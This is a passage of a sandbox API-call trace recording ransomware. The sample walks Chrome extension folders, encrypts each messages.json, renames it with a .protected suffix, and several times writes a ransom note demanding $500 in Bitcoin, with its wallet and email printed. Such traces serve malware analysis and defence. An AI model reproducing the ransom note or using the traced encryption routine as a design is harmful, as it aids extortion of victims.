lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.497] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.497] CloseHandle (hObject=0x168) returned 1 [0080.497] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_CA\\messages.json.protected") returned 168 [0080.497] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_CA\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_ca\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_CA\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_ca\\messages.json.protected")) returned 1 [0080.498] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.498] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.498] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_CA\\RESTORE_FILES.txt") returned 162 [0080.498] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_CA\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr_ca\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.498] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.498] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.499] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.499] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.499] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.499] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.499] CloseHandle (hObject=0x164) returned 1 [0080.499] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.499] lstrcmpiW (lpString1="gl", lpString2="Windows") returned -1 [0080.499] lstrcmpiW (lpString1="gl", lpString2="Program Files") returned -1 [0080.499] lstrcmpiW (lpString1="gl", lpString2="Program Files (x86)") returned -1 [0080.499] lstrcmpiW (lpString1="gl", lpString2="$Recycle.bin") returned 1 [0080.499] lstrcmpiW (lpString1="gl", lpString2="System Volume Information") returned -1 [0080.499] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl") returned 141 [0080.499] lstrcmpW (lpString1="gl", lpString2=".") returned 1 [0080.499] lstrcmpW (lpString1="gl", lpString2="..") returned 1 [0080.499] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\*") returned 143 [0080.499] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.500] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.500] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.500] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.500] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.500] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.500] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\.") returned 143 [0080.500] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.500] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.500] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.500] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.500] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.500] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.500] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.500] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\..") returned 144 [0080.500] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.500] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.500] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.500] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.500] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.500] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.500] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.500] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.500] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\messages.json") returned 155 [0080.500] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.500] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.500] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.500] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.500] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.501] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\messages.json") returned 155 [0080.501] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.501] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\messages.json") returned 155 [0080.501] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.501] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\messages.json") returned 155 [0080.501] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.501] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xac, lpOverlapped=0x0) returned 1 [0080.502] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff54, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.502] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xac, lpOverlapped=0x0) returned 1 [0080.502] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.502] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.502] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.502] CloseHandle (hObject=0x168) returned 1 [0080.502] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\messages.json.protected") returned 165 [0080.502] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\messages.json.protected")) returned 1 [0080.503] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.503] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.503] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\RESTORE_FILES.txt") returned 159 [0080.503] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gl\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.503] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.503] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.504] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.504] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.504] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.504] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.504] CloseHandle (hObject=0x164) returned 1 [0080.504] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.504] lstrcmpiW (lpString1="gu", lpString2="Windows") returned -1 [0080.504] lstrcmpiW (lpString1="gu", lpString2="Program Files") returned -1 [0080.504] lstrcmpiW (lpString1="gu", lpString2="Program Files (x86)") returned -1 [0080.504] lstrcmpiW (lpString1="gu", lpString2="$Recycle.bin") returned 1 [0080.504] lstrcmpiW (lpString1="gu", lpString2="System Volume Information") returned -1 [0080.504] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu") returned 141 [0080.504] lstrcmpW (lpString1="gu", lpString2=".") returned 1 [0080.504] lstrcmpW (lpString1="gu", lpString2="..") returned 1 [0080.504] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu\\*") returned 143 [0080.504] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.505] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.505] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.505] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.505] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.505] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.505] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu\\.") returned 143 [0080.505] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.505] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.505] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.505] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.505] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.505] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.505] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.505] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu\\..") returned 144 [0080.505] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.505] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.505] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.505] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.505] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.505] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.505] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.505] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.505] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu\\messages.json") returned 155 [0080.505] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.505] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.505] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.505] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.505] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.505] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu\\messages.json") returned 155 [0080.506] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.506] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu\\messages.json") returned 155 [0080.506] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.506] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu\\messages.json") returned 155 [0080.506] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.506] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x11e, lpOverlapped=0x0) returned 1 [0080.506] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffee2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.506] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x11e, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x11e, lpOverlapped=0x0) returned 1 [0080.507] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.507] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.507] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, 